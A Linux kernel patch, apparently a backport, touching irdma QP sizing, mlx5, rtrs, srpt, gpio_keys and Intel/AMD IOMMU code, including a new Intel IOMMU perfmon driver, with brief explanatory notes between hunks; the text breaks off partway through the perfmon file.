++				struct irdma_device *iwdev,
++				struct irdma_qp *iwqp,
++				struct irdma_qp_init_info *info,
++				struct ib_qp_init_attr *init_attr)
++{
++	struct irdma_ucontext *ucontext = rdma_udata_to_drv_context(udata,
++				struct irdma_ucontext, ibucontext);
++	struct irdma_qp_uk_init_info *ukinfo = &info->qp_uk_init_info;
++	struct irdma_create_qp_req req;
++	unsigned long flags;
++	int ret;
++
++	ret = ib_copy_from_udata(&req, udata,
++				 min(sizeof(req), udata->inlen));
++	if (ret) {
++		ibdev_dbg(&iwdev->ibdev, "VERBS: ib_copy_from_data fail\n");
++		return ret;
++	}
++
++	iwqp->ctx_info.qp_compl_ctx = req.user_compl_ctx;
++	iwqp->user_mode = 1;
++	if (req.user_wqe_bufs) {
++		info->qp_uk_init_info.legacy_mode = ucontext->legacy_mode;
++		spin_lock_irqsave(&ucontext->qp_reg_mem_list_lock, flags);
++		iwqp->iwpbl = irdma_get_pbl((unsigned long)req.user_wqe_bufs,
++					    &ucontext->qp_reg_mem_list);
++		spin_unlock_irqrestore(&ucontext->qp_reg_mem_list_lock, flags);
++
++		if (!iwqp->iwpbl) {
++			ret = -ENODATA;
++			ibdev_dbg(&iwdev->ibdev, "VERBS: no pbl info\n");
++			return ret;
++		}
++	}
++
++	if (!ucontext->use_raw_attrs) {
++		/**
++		 * Maintain backward compat with older ABI which passes sq and
++		 * rq depth in quanta in cap.max_send_wr and cap.max_recv_wr.
++		 * There is no way to compute the correct value of
++		 * iwqp->max_send_wr/max_recv_wr in the kernel.
++		 */
++		iwqp->max_send_wr = init_attr->cap.max_send_wr;
++		iwqp->max_recv_wr = init_attr->cap.max_recv_wr;
++		ukinfo->sq_size = init_attr->cap.max_send_wr;
++		ukinfo->rq_size = init_attr->cap.max_recv_wr;
++		irdma_uk_calc_shift_wq(ukinfo, &ukinfo->sq_shift,
++				       &ukinfo->rq_shift);
++	} else {
++		ret = irdma_uk_calc_depth_shift_sq(ukinfo, &ukinfo->sq_depth,
++						   &ukinfo->sq_shift);
++		if (ret)
++			return ret;
++
++		ret = irdma_uk_calc_depth_shift_rq(ukinfo, &ukinfo->rq_depth,
++						   &ukinfo->rq_shift);
++		if (ret)
++			return ret;
++
++		iwqp->max_send_wr =
++			(ukinfo->sq_depth - IRDMA_SQ_RSVD) >> ukinfo->sq_shift;
++		iwqp->max_recv_wr =
++			(ukinfo->rq_depth - IRDMA_RQ_RSVD) >> ukinfo->rq_shift;
++		ukinfo->sq_size = ukinfo->sq_depth >> ukinfo->sq_shift;
++		ukinfo->rq_size = ukinfo->rq_depth >> ukinfo->rq_shift;
++	}
++
++	irdma_setup_virt_qp(iwdev, iwqp, info);
++
++	return 0;
++}
++
+ /**
+  * irdma_setup_kmode_qp - setup initialization for kernel mode qp
+  * @iwdev: iwarp device
+@@ -579,40 +662,28 @@ static int irdma_setup_kmode_qp(struct irdma_device *iwdev,
+ 				struct ib_qp_init_attr *init_attr)
+ {
+ 	struct irdma_dma_mem *mem = &iwqp->kqp.dma_mem;
+-	u32 sqdepth, rqdepth;
+-	u8 sqshift, rqshift;
+ 	u32 size;
+ 	int status;
+ 	struct irdma_qp_uk_init_info *ukinfo = &info->qp_uk_init_info;
+-	struct irdma_uk_attrs *uk_attrs = &iwdev->rf->sc_dev.hw_attrs.uk_attrs;
+ 
+-	irdma_get_wqe_shift(uk_attrs,
+-		uk_attrs->hw_rev >= IRDMA_GEN_2 ? ukinfo->max_sq_frag_cnt + 1 :
+-						  ukinfo->max_sq_frag_cnt,
+-		ukinfo->max_inline_data, &sqshift);
+-	status = irdma_get_sqdepth(uk_attrs, ukinfo->sq_size, sqshift,
+-				   &sqdepth);
++	status = irdma_uk_calc_depth_shift_sq(ukinfo, &ukinfo->sq_depth,
++					      &ukinfo->sq_shift);
+ 	if (status)
+ 		return status;
+ 
+-	if (uk_attrs->hw_rev == IRDMA_GEN_1)
+-		rqshift = IRDMA_MAX_RQ_WQE_SHIFT_GEN1;
+-	else
+-		irdma_get_wqe_shift(uk_attrs, ukinfo->max_rq_frag_cnt, 0,
+-				    &rqshift);
+-
+-	status = irdma_get_rqdepth(uk_attrs, ukinfo->rq_size, rqshift,
+-				   &rqdepth);
++	status = irdma_uk_calc_depth_shift_rq(ukinfo, &ukinfo->rq_depth,
++					      &ukinfo->rq_shift);
+ 	if (status)
+ 		return status;
+ 
+ 	iwqp->kqp.sq_wrid_mem =
+-		kcalloc(sqdepth, sizeof(*iwqp->kqp.sq_wrid_mem), GFP_KERNEL);
++		kcalloc(ukinfo->sq_depth, sizeof(*iwqp->kqp.sq_wrid_mem), GFP_KERNEL);
+ 	if (!iwqp->kqp.sq_wrid_mem)
+ 		return -ENOMEM;
+ 
+ 	iwqp->kqp.rq_wrid_mem =
+-		kcalloc(rqdepth, sizeof(*iwqp->kqp.rq_wrid_mem), GFP_KERNEL);
++		kcalloc(ukinfo->rq_depth, sizeof(*iwqp->kqp.rq_wrid_mem), GFP_KERNEL);
++
+ 	if (!iwqp->kqp.rq_wrid_mem) {
+ 		kfree(iwqp->kqp.sq_wrid_mem);
+ 		iwqp->kqp.sq_wrid_mem = NULL;
+@@ -622,7 +693,7 @@ static int irdma_setup_kmode_qp(struct irdma_device *iwdev,
+ 	ukinfo->sq_wrtrk_array = iwqp->kqp.sq_wrid_mem;
+ 	ukinfo->rq_wrid_array = iwqp->kqp.rq_wrid_mem;
+ 
+-	size = (sqdepth + rqdepth) * IRDMA_QP_WQE_MIN_SIZE;
++	size = (ukinfo->sq_depth + ukinfo->rq_depth) * IRDMA_QP_WQE_MIN_SIZE;
+ 	size += (IRDMA_SHADOW_AREA_SIZE << 3);
+ 
+ 	mem->size = ALIGN(size, 256);
+@@ -638,16 +709,18 @@ static int irdma_setup_kmode_qp(struct irdma_device *iwdev,
+ 
+ 	ukinfo->sq = mem->va;
+ 	info->sq_pa = mem->pa;
+-	ukinfo->rq = &ukinfo->sq[sqdepth];
+-	info->rq_pa = info->sq_pa + (sqdepth * IRDMA_QP_WQE_MIN_SIZE);
+-	ukinfo->shadow_area = ukinfo->rq[rqdepth].elem;
+-	info->shadow_area_pa = info->rq_pa + (rqdepth * IRDMA_QP_WQE_MIN_SIZE);
+-	ukinfo->sq_size = sqdepth >> sqshift;
+-	ukinfo->rq_size = rqdepth >> rqshift;
+-	ukinfo->qp_id = iwqp->ibqp.qp_num;
+-
+-	init_attr->cap.max_send_wr = (sqdepth - IRDMA_SQ_RSVD) >> sqshift;
+-	init_attr->cap.max_recv_wr = (rqdepth - IRDMA_RQ_RSVD) >> rqshift;
++	ukinfo->rq = &ukinfo->sq[ukinfo->sq_depth];
++	info->rq_pa = info->sq_pa + (ukinfo->sq_depth * IRDMA_QP_WQE_MIN_SIZE);
++	ukinfo->shadow_area = ukinfo->rq[ukinfo->rq_depth].elem;
++	info->shadow_area_pa =
++		info->rq_pa + (ukinfo->rq_depth * IRDMA_QP_WQE_MIN_SIZE);
++	ukinfo->sq_size = ukinfo->sq_depth >> ukinfo->sq_shift;
++	ukinfo->rq_size = ukinfo->rq_depth >> ukinfo->rq_shift;
++
++	iwqp->max_send_wr = (ukinfo->sq_depth - IRDMA_SQ_RSVD) >> ukinfo->sq_shift;
++	iwqp->max_recv_wr = (ukinfo->rq_depth - IRDMA_RQ_RSVD) >> ukinfo->rq_shift;
++	init_attr->cap.max_send_wr = iwqp->max_send_wr;
++	init_attr->cap.max_recv_wr = iwqp->max_recv_wr;
+ 
+ 	return 0;
+ }
+@@ -805,18 +878,14 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 	struct irdma_device *iwdev = to_iwdev(ibpd->device);
+ 	struct irdma_pci_f *rf = iwdev->rf;
+ 	struct irdma_qp *iwqp = to_iwqp(ibqp);
+-	struct irdma_create_qp_req req = {};
+ 	struct irdma_create_qp_resp uresp = {};
+ 	u32 qp_num = 0;
+ 	int err_code;
+-	int sq_size;
+-	int rq_size;
+ 	struct irdma_sc_qp *qp;
+ 	struct irdma_sc_dev *dev = &rf->sc_dev;
+ 	struct irdma_uk_attrs *uk_attrs = &dev->hw_attrs.uk_attrs;
+ 	struct irdma_qp_init_info init_info = {};
+ 	struct irdma_qp_host_ctx_info *ctx_info;
+-	unsigned long flags;
+ 
+ 	err_code = irdma_validate_qp_attrs(init_attr, iwdev);
+ 	if (err_code)
+@@ -826,13 +895,10 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 		      udata->outlen < IRDMA_CREATE_QP_MIN_RESP_LEN))
+ 		return -EINVAL;
+ 
+-	sq_size = init_attr->cap.max_send_wr;
+-	rq_size = init_attr->cap.max_recv_wr;
+-
+ 	init_info.vsi = &iwdev->vsi;
+ 	init_info.qp_uk_init_info.uk_attrs = uk_attrs;
+-	init_info.qp_uk_init_info.sq_size = sq_size;
+-	init_info.qp_uk_init_info.rq_size = rq_size;
++	init_info.qp_uk_init_info.sq_size = init_attr->cap.max_send_wr;
++	init_info.qp_uk_init_info.rq_size = init_attr->cap.max_recv_wr;
+ 	init_info.qp_uk_init_info.max_sq_frag_cnt = init_attr->cap.max_send_sge;
+ 	init_info.qp_uk_init_info.max_rq_frag_cnt = init_attr->cap.max_recv_sge;
+ 	init_info.qp_uk_init_info.max_inline_data = init_attr->cap.max_inline_data;
+@@ -874,7 +940,7 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 	iwqp->host_ctx.size = IRDMA_QP_CTX_SIZE;
+ 
+ 	init_info.pd = &iwpd->sc_pd;
+-	init_info.qp_uk_init_info.qp_id = iwqp->ibqp.qp_num;
++	init_info.qp_uk_init_info.qp_id = qp_num;
+ 	if (!rdma_protocol_roce(&iwdev->ibdev, 1))
+ 		init_info.qp_uk_init_info.first_sq_wq = 1;
+ 	iwqp->ctx_info.qp_compl_ctx = (uintptr_t)qp;
+@@ -882,36 +948,9 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 	init_waitqueue_head(&iwqp->mod_qp_waitq);
+ 
+ 	if (udata) {
+-		err_code = ib_copy_from_udata(&req, udata,
+-					      min(sizeof(req), udata->inlen));
+-		if (err_code) {
+-			ibdev_dbg(&iwdev->ibdev,
+-				  "VERBS: ib_copy_from_data fail\n");
+-			goto error;
+-		}
+-
+-		iwqp->ctx_info.qp_compl_ctx = req.user_compl_ctx;
+-		iwqp->user_mode = 1;
+-		if (req.user_wqe_bufs) {
+-			struct irdma_ucontext *ucontext =
+-				rdma_udata_to_drv_context(udata,
+-							  struct irdma_ucontext,
+-							  ibucontext);
+-
+-			init_info.qp_uk_init_info.legacy_mode = ucontext->legacy_mode;
+-			spin_lock_irqsave(&ucontext->qp_reg_mem_list_lock, flags);
+-			iwqp->iwpbl = irdma_get_pbl((unsigned long)req.user_wqe_bufs,
+-						    &ucontext->qp_reg_mem_list);
+-			spin_unlock_irqrestore(&ucontext->qp_reg_mem_list_lock, flags);
+-
+-			if (!iwqp->iwpbl) {
+-				err_code = -ENODATA;
+-				ibdev_dbg(&iwdev->ibdev, "VERBS: no pbl info\n");
+-				goto error;
+-			}
+-		}
+ 		init_info.qp_uk_init_info.abi_ver = iwpd->sc_pd.abi_ver;
+-		irdma_setup_virt_qp(iwdev, iwqp, &init_info);
++		err_code = irdma_setup_umode_qp(udata, iwdev, iwqp, &init_info,
++						init_attr);
+ 	} else {
+ 		INIT_DELAYED_WORK(&iwqp->dwork_flush, irdma_flush_worker);
+ 		init_info.qp_uk_init_info.abi_ver = IRDMA_ABI_VER;
+@@ -966,8 +1005,6 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 	spin_lock_init(&iwqp->sc_qp.pfpdu.lock);
+ 	iwqp->sig_all = (init_attr->sq_sig_type == IB_SIGNAL_ALL_WR) ? 1 : 0;
+ 	rf->qp_table[qp_num] = iwqp;
+-	iwqp->max_send_wr = sq_size;
+-	iwqp->max_recv_wr = rq_size;
+ 
+ 	if (rdma_protocol_roce(&iwdev->ibdev, 1)) {
+ 		if (dev->ws_add(&iwdev->vsi, 0)) {
+@@ -988,8 +1025,8 @@ static int irdma_create_qp(struct ib_qp *ibqp,
+ 			if (rdma_protocol_iwarp(&iwdev->ibdev, 1))
+ 				uresp.lsmm = 1;
+ 		}
+-		uresp.actual_sq_size = sq_size;
+-		uresp.actual_rq_size = rq_size;
++		uresp.actual_sq_size = init_info.qp_uk_init_info.sq_size;
++		uresp.actual_rq_size = init_info.qp_uk_init_info.rq_size;
+ 		uresp.qp_id = qp_num;
+ 		uresp.qp_caps = qp->qp_uk.qp_caps;
+ 
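
The sizing math running through the irdma changes is easy to misread: depths are measured in quanta, the shift gives quanta per WQE, and some quanta are reserved, so the user-visible limits are derived values. With invented numbers (the real IRDMA_SQ_RSVD is defined elsewhere in the driver):

	static void sizing_example(void)
	{
		u32 sq_depth = 128;	/* total SQ quanta (assumed) */
		u8 sq_shift = 2;	/* 1 << 2 == 4 quanta per WQE */
		u32 rsvd = 8;		/* assumed reserved quanta */

		pr_info("sq_size=%u max_send_wr=%u\n",
			sq_depth >> sq_shift,		/* 32 WQE slots */
			(sq_depth - rsvd) >> sq_shift);	/* 30 postable WRs */
	}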
+diff --git a/drivers/infiniband/hw/irdma/verbs.h b/drivers/infiniband/hw/irdma/verbs.h
+index 9f9e273bbff3e..0bc0d0faa0868 100644
+--- a/drivers/infiniband/hw/irdma/verbs.h
++++ b/drivers/infiniband/hw/irdma/verbs.h
+@@ -18,7 +18,8 @@ struct irdma_ucontext {
+ 	struct list_head qp_reg_mem_list;
+ 	spinlock_t qp_reg_mem_list_lock; /* protect QP memory list */
+ 	int abi_ver;
+-	bool legacy_mode;
++	u8 legacy_mode : 1;
++	u8 use_raw_attrs : 1;
+ };
+ 
+ struct irdma_pd {
+diff --git a/drivers/infiniband/hw/mlx5/devx.c b/drivers/infiniband/hw/mlx5/devx.c
+index f8e2baed27a5c..7013ce20549bd 100644
+--- a/drivers/infiniband/hw/mlx5/devx.c
++++ b/drivers/infiniband/hw/mlx5/devx.c
+@@ -2951,7 +2951,7 @@ DECLARE_UVERBS_NAMED_METHOD(
+ 	MLX5_IB_METHOD_DEVX_OBJ_MODIFY,
+ 	UVERBS_ATTR_IDR(MLX5_IB_ATTR_DEVX_OBJ_MODIFY_HANDLE,
+ 			UVERBS_IDR_ANY_OBJECT,
+-			UVERBS_ACCESS_WRITE,
++			UVERBS_ACCESS_READ,
+ 			UA_MANDATORY),
+ 	UVERBS_ATTR_PTR_IN(
+ 		MLX5_IB_ATTR_DEVX_OBJ_MODIFY_CMD_IN,
+diff --git a/drivers/infiniband/hw/mlx5/wr.c b/drivers/infiniband/hw/mlx5/wr.c
+index 855f3f4fefadd..737db67a9ce1d 100644
+--- a/drivers/infiniband/hw/mlx5/wr.c
++++ b/drivers/infiniband/hw/mlx5/wr.c
+@@ -78,7 +78,7 @@ static void set_eth_seg(const struct ib_send_wr *wr, struct mlx5_ib_qp *qp,
+ 		 */
+ 		copysz = min_t(u64, *cur_edge - (void *)eseg->inline_hdr.start,
+ 			       left);
+-		memcpy(eseg->inline_hdr.start, pdata, copysz);
++		memcpy(eseg->inline_hdr.data, pdata, copysz);
+ 		stride = ALIGN(sizeof(struct mlx5_wqe_eth_seg) -
+ 			       sizeof(eseg->inline_hdr.start) + copysz, 16);
+ 		*size += stride / 16;
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs-clt-sysfs.c b/drivers/infiniband/ulp/rtrs/rtrs-clt-sysfs.c
+index d3c436ead6946..4aa80c9388f05 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs-clt-sysfs.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs-clt-sysfs.c
+@@ -133,7 +133,7 @@ static ssize_t mpath_policy_store(struct device *dev,
+ 
+ 	/* distinguish "mi" and "min-latency" with length */
+ 	len = strnlen(buf, NAME_MAX);
+-	if (buf[len - 1] == '\n')
++	if (len && buf[len - 1] == '\n')
+ 		len--;
+ 
+ 	if (!strncasecmp(buf, "round-robin", 11) ||
+diff --git a/drivers/infiniband/ulp/srpt/ib_srpt.c b/drivers/infiniband/ulp/srpt/ib_srpt.c
+index cffa93f114a73..fd6c260d5857d 100644
+--- a/drivers/infiniband/ulp/srpt/ib_srpt.c
++++ b/drivers/infiniband/ulp/srpt/ib_srpt.c
+@@ -3209,7 +3209,6 @@ static int srpt_add_one(struct ib_device *device)
+ 
+ 	INIT_IB_EVENT_HANDLER(&sdev->event_handler, sdev->device,
+ 			      srpt_event_handler);
+-	ib_register_event_handler(&sdev->event_handler);
+ 
+ 	for (i = 1; i <= sdev->device->phys_port_cnt; i++) {
+ 		sport = &sdev->port[i - 1];
+@@ -3232,6 +3231,7 @@ static int srpt_add_one(struct ib_device *device)
+ 		}
+ 	}
+ 
++	ib_register_event_handler(&sdev->event_handler);
+ 	spin_lock(&srpt_dev_lock);
+ 	list_add_tail(&sdev->list, &srpt_dev_list);
+ 	spin_unlock(&srpt_dev_lock);
+@@ -3242,7 +3242,6 @@ static int srpt_add_one(struct ib_device *device)
+ 
+ err_port:
+ 	srpt_unregister_mad_agent(sdev, i);
+-	ib_unregister_event_handler(&sdev->event_handler);
+ err_cm:
+ 	if (sdev->cm_id)
+ 		ib_destroy_cm_id(sdev->cm_id);
+diff --git a/drivers/input/keyboard/gpio_keys_polled.c b/drivers/input/keyboard/gpio_keys_polled.c
+index c3937d2fc7446..a0f9978c68f55 100644
+--- a/drivers/input/keyboard/gpio_keys_polled.c
++++ b/drivers/input/keyboard/gpio_keys_polled.c
+@@ -319,12 +319,10 @@ static int gpio_keys_polled_probe(struct platform_device *pdev)
+ 
+ 			error = devm_gpio_request_one(dev, button->gpio,
+ 					flags, button->desc ? : DRV_NAME);
+-			if (error) {
+-				dev_err(dev,
+-					"unable to claim gpio %u, err=%d\n",
+-					button->gpio, error);
+-				return error;
+-			}
++			if (error)
++				return dev_err_probe(dev, error,
++						     "unable to claim gpio %u\n",
++						     button->gpio);
+ 
+ 			bdata->gpiod = gpio_to_desc(button->gpio);
+ 			if (!bdata->gpiod) {
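
The gpio_keys_polled hunk replaces a dev_err() + return pair with dev_err_probe(), which returns the error it was given, appends the error code to the message, and stays quiet for -EPROBE_DEFER while recording the deferral reason. The resulting probe-path idiom, sketched:

	static int example_probe(struct platform_device *pdev)
	{
		struct clk *clk = devm_clk_get(&pdev->dev, NULL);

		if (IS_ERR(clk))
			return dev_err_probe(&pdev->dev, PTR_ERR(clk),
					     "failed to get clock\n");
		return 0;
	}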
+diff --git a/drivers/iommu/Kconfig b/drivers/iommu/Kconfig
+index dc5f7a156ff5e..dc19e7fb07cfe 100644
+--- a/drivers/iommu/Kconfig
++++ b/drivers/iommu/Kconfig
+@@ -192,7 +192,7 @@ source "drivers/iommu/intel/Kconfig"
+ config IRQ_REMAP
+ 	bool "Support for Interrupt Remapping"
+ 	depends on X86_64 && X86_IO_APIC && PCI_MSI && ACPI
+-	select DMAR_TABLE
++	select DMAR_TABLE if INTEL_IOMMU
+ 	help
+ 	  Supports Interrupt remapping for IO-APIC and MSI devices.
+ 	  To use x2apic mode in the CPU's which support x2APIC enhancements or
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index f6e64c9858021..cc94ac6662339 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -2047,6 +2047,9 @@ static int __init iommu_init_pci(struct amd_iommu *iommu)
+ 	/* Prevent binding other PCI device drivers to IOMMU devices */
+ 	iommu->dev->match_driver = false;
+ 
++	/* ACPI _PRT won't have an IRQ for IOMMU */
++	iommu->dev->irq_managed = 1;
++
+ 	pci_read_config_dword(iommu->dev, cap_ptr + MMIO_CAP_HDR_OFFSET,
+ 			      &iommu->cap);
+ 
+diff --git a/drivers/iommu/intel/Kconfig b/drivers/iommu/intel/Kconfig
+index b7dff5092fd21..12e1e90fdae13 100644
+--- a/drivers/iommu/intel/Kconfig
++++ b/drivers/iommu/intel/Kconfig
+@@ -96,4 +96,15 @@ config INTEL_IOMMU_SCALABLE_MODE_DEFAULT_ON
+ 	  passing intel_iommu=sm_on to the kernel. If not sure, please use
+ 	  the default value.
+ 
++config INTEL_IOMMU_PERF_EVENTS
++	def_bool y
++	bool "Intel IOMMU performance events"
++	depends on INTEL_IOMMU && PERF_EVENTS
++	help
++	  Selecting this option will enable the performance monitoring
++	  infrastructure in the Intel IOMMU. It collects information about
++	  key events occurring during operation of the remapping hardware,
++	  to aid performance tuning and debug. These are available on modern
++	  processors which support Intel VT-d 4.0 and later.
++
+ endif # INTEL_IOMMU
+diff --git a/drivers/iommu/intel/Makefile b/drivers/iommu/intel/Makefile
+index fa0dae16441cb..29d26a4371327 100644
+--- a/drivers/iommu/intel/Makefile
++++ b/drivers/iommu/intel/Makefile
+@@ -5,4 +5,7 @@ obj-$(CONFIG_DMAR_TABLE) += trace.o cap_audit.o
+ obj-$(CONFIG_DMAR_PERF) += perf.o
+ obj-$(CONFIG_INTEL_IOMMU_DEBUGFS) += debugfs.o
+ obj-$(CONFIG_INTEL_IOMMU_SVM) += svm.o
++ifdef CONFIG_INTEL_IOMMU
+ obj-$(CONFIG_IRQ_REMAP) += irq_remapping.o
++endif
++obj-$(CONFIG_INTEL_IOMMU_PERF_EVENTS) += perfmon.o
+diff --git a/drivers/iommu/intel/dmar.c b/drivers/iommu/intel/dmar.c
+index 418af1db0192d..4759f79ad7b94 100644
+--- a/drivers/iommu/intel/dmar.c
++++ b/drivers/iommu/intel/dmar.c
+@@ -34,6 +34,7 @@
+ #include "../irq_remapping.h"
+ #include "perf.h"
+ #include "trace.h"
++#include "perfmon.h"
+ 
+ typedef int (*dmar_res_handler_t)(struct acpi_dmar_header *, void *);
+ struct dmar_res_callback {
+@@ -1104,6 +1105,9 @@ static int alloc_iommu(struct dmar_drhd_unit *drhd)
+ 	if (sts & DMA_GSTS_QIES)
+ 		iommu->gcmd |= DMA_GCMD_QIE;
+ 
++	if (alloc_iommu_pmu(iommu))
++		pr_debug("Cannot alloc PMU for iommu (seq_id = %d)\n", iommu->seq_id);
++
+ 	raw_spin_lock_init(&iommu->register_lock);
+ 
+ 	/*
+@@ -1131,6 +1135,7 @@ static int alloc_iommu(struct dmar_drhd_unit *drhd)
+ err_sysfs:
+ 	iommu_device_sysfs_remove(&iommu->iommu);
+ err_unmap:
++	free_iommu_pmu(iommu);
+ 	unmap_iommu(iommu);
+ error_free_seq_id:
+ 	ida_free(&dmar_seq_ids, iommu->seq_id);
+@@ -1146,6 +1151,8 @@ static void free_iommu(struct intel_iommu *iommu)
+ 		iommu_device_sysfs_remove(&iommu->iommu);
+ 	}
+ 
++	free_iommu_pmu(iommu);
++
+ 	if (iommu->irq) {
+ 		if (iommu->pr_irq) {
+ 			free_irq(iommu->pr_irq, iommu);
+diff --git a/drivers/iommu/intel/iommu.h b/drivers/iommu/intel/iommu.h
+index c99cb715bd9a2..c1348bedab3b3 100644
+--- a/drivers/iommu/intel/iommu.h
++++ b/drivers/iommu/intel/iommu.h
+@@ -125,6 +125,11 @@
+ #define DMAR_MTRR_PHYSMASK8_REG 0x208
+ #define DMAR_MTRR_PHYSBASE9_REG 0x210
+ #define DMAR_MTRR_PHYSMASK9_REG 0x218
++#define DMAR_PERFCAP_REG	0x300
++#define DMAR_PERFCFGOFF_REG	0x310
++#define DMAR_PERFOVFOFF_REG	0x318
++#define DMAR_PERFCNTROFF_REG	0x31c
++#define DMAR_PERFEVNTCAP_REG	0x380
+ #define DMAR_VCCAP_REG		0xe30 /* Virtual command capability register */
+ #define DMAR_VCMD_REG		0xe00 /* Virtual command register */
+ #define DMAR_VCRSP_REG		0xe10 /* Virtual command response register */
+@@ -148,6 +153,7 @@
+  */
+ #define cap_esrtps(c)		(((c) >> 63) & 1)
+ #define cap_esirtps(c)		(((c) >> 62) & 1)
++#define cap_ecmds(c)		(((c) >> 61) & 1)
+ #define cap_fl5lp_support(c)	(((c) >> 60) & 1)
+ #define cap_pi_support(c)	(((c) >> 59) & 1)
+ #define cap_fl1gp_support(c)	(((c) >> 56) & 1)
+@@ -179,7 +185,8 @@
+  * Extended Capability Register
+  */
+ 
+-#define	ecap_rps(e)		(((e) >> 49) & 0x1)
++#define ecap_pms(e)		(((e) >> 51) & 0x1)
++#define ecap_rps(e)		(((e) >> 49) & 0x1)
+ #define ecap_smpwc(e)		(((e) >> 48) & 0x1)
+ #define ecap_flts(e)		(((e) >> 47) & 0x1)
+ #define ecap_slts(e)		(((e) >> 46) & 0x1)
+@@ -210,6 +217,22 @@
+ #define ecap_max_handle_mask(e) (((e) >> 20) & 0xf)
+ #define ecap_sc_support(e)	(((e) >> 7) & 0x1) /* Snooping Control */
+ 
++/*
++ * Decoding Perf Capability Register
++ */
++#define pcap_num_cntr(p)	((p) & 0xffff)
++#define pcap_cntr_width(p)	(((p) >> 16) & 0x7f)
++#define pcap_num_event_group(p)	(((p) >> 24) & 0x1f)
++#define pcap_filters_mask(p)	(((p) >> 32) & 0x1f)
++#define pcap_interrupt(p)	(((p) >> 50) & 0x1)
++/* The counter stride is calculated as 2 ^ (x+10) bytes */
++#define pcap_cntr_stride(p)	(1ULL << ((((p) >> 52) & 0x7) + 10))
++
++/*
++ * Decoding Perf Event Capability Register
++ */
++#define pecap_es(p)		((p) & 0xfffffff)
++
+ /* Virtual command interface capability */
+ #define vccap_pasid(v)		(((v) & DMA_VCS_PAS)) /* PASID allocation */
+ 
+@@ -561,6 +584,22 @@ struct dmar_domain {
+ 					   iommu core */
+ };
+ 
++struct iommu_pmu {
++	struct intel_iommu	*iommu;
++	u32			num_cntr;	/* Number of counters */
++	u32			num_eg;		/* Number of event group */
++	u32			cntr_width;	/* Counter width */
++	u32			cntr_stride;	/* Counter Stride */
++	u32			filter;		/* Bitmask of filter support */
++	void __iomem		*base;		/* the PerfMon base address */
++	void __iomem		*cfg_reg;	/* counter configuration base address */
++	void __iomem		*cntr_reg;	/* counter 0 address */
++	void __iomem		*overflow;	/* overflow status register */
++
++	u64			*evcap;		/* Indicates all supported events */
++	u32			**cntr_evcap;	/* Supported events of each counter. */
++};
++
+ struct intel_iommu {
+ 	void __iomem	*reg; /* Pointer to hardware regs, virtual addr */
+ 	u64 		reg_phys; /* physical address of hw register set */
+@@ -608,6 +647,8 @@ struct intel_iommu {
+ 
+ 	struct dmar_drhd_unit *drhd;
+ 	void *perf_statistic;
++
++	struct iommu_pmu *pmu;
+ };
+ 
+ /* PCI domain-device relationship */
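
The new DMAR_PERFCAP_REG macros unpack one 64-bit register; the only non-obvious field is the counter stride, stored as an exponent so that stride = 2^(field + 10) bytes. A worked decode with an invented register value:

	static void decode_example(void)
	{
		u64 perfcap = (1ULL << 52)	/* stride field (bits 54:52) = 1 */
			    | (8ULL << 24)	/* eight event groups */
			    | 36;		/* 36 counters */

		pr_info("cntrs=%llu groups=%llu stride=%llu\n",
			pcap_num_cntr(perfcap),		/* 36 */
			pcap_num_event_group(perfcap),	/* 8 */
			pcap_cntr_stride(perfcap));	/* 1 << 11 == 2048 */
	}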
+diff --git a/drivers/iommu/intel/pasid.c b/drivers/iommu/intel/pasid.c
+index 3f03039e5cce5..32432d82d7744 100644
+--- a/drivers/iommu/intel/pasid.c
++++ b/drivers/iommu/intel/pasid.c
+@@ -435,6 +435,9 @@ devtlb_invalidation_with_pasid(struct intel_iommu *iommu,
+ 	if (!info || !info->ats_enabled)
+ 		return;
+ 
++	if (pci_dev_is_disconnected(to_pci_dev(dev)))
++		return;
++
+ 	sid = info->bus << 8 | info->devfn;
+ 	qdep = info->ats_qdep;
+ 	pfsid = info->pfsid;
+diff --git a/drivers/iommu/intel/perfmon.c b/drivers/iommu/intel/perfmon.c
+new file mode 100644
+index 0000000000000..db5791a544551
+--- /dev/null
++++ b/drivers/iommu/intel/perfmon.c
+@@ -0,0 +1,172 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/*
++ * Support Intel IOMMU PerfMon
++ * Copyright(c) 2023 Intel Corporation.
++ */
++#define pr_fmt(fmt)	"DMAR: " fmt
++#define dev_fmt(fmt)	pr_fmt(fmt)
++
++#include <linux/dmar.h>
++#include "iommu.h"
++#include "perfmon.h"
++
++static inline void __iomem *
++get_perf_reg_address(struct intel_iommu *iommu, u32 offset)
++{
++	u32 off = dmar_readl(iommu->reg + offset);
++
++	return iommu->reg + off;
++}
++
++int alloc_iommu_pmu(struct intel_iommu *iommu)
++{
++	struct iommu_pmu *iommu_pmu;
++	int i, j, ret;
++	u64 perfcap;
++	u32 cap;
++
++	if (!ecap_pms(iommu->ecap))
++		return 0;
++
++	/* The IOMMU PMU requires the ECMD support as well */
++	if (!cap_ecmds(iommu->cap))
++		return -ENODEV;
++
++	perfcap = dmar_readq(iommu->reg + DMAR_PERFCAP_REG);
++	/* The performance monitoring is not supported. */
++	if (!perfcap)
++		return -ENODEV;
++
++	/* Sanity check for the number of the counters and event groups */
++	if (!pcap_num_cntr(perfcap) || !pcap_num_event_group(perfcap))
++		return -ENODEV;
++
++	/* The interrupt on overflow is required */
++	if (!pcap_interrupt(perfcap))
++		return -ENODEV;
++
++	iommu_pmu = kzalloc(sizeof(*iommu_pmu), GFP_KERNEL);
++	if (!iommu_pmu)
++		return -ENOMEM;
++
++	iommu_pmu->num_cntr = pcap_num_cntr(perfcap);
++	iommu_pmu->cntr_width = pcap_cntr_width(perfcap);
++	iommu_pmu->filter = pcap_filters_mask(perfcap);
++	iommu_pmu->cntr_stride = pcap_cntr_stride(perfcap);
++	iommu_pmu->num_eg = pcap_num_event_group(perfcap);
++
++	iommu_pmu->evcap = kcalloc(iommu_pmu->num_eg, sizeof(u64), GFP_KERNEL);
++	if (!iommu_pmu->evcap) {
++		ret = -ENOMEM;
++		goto free_pmu;
++	}
++
++	/* Parse event group capabilities */
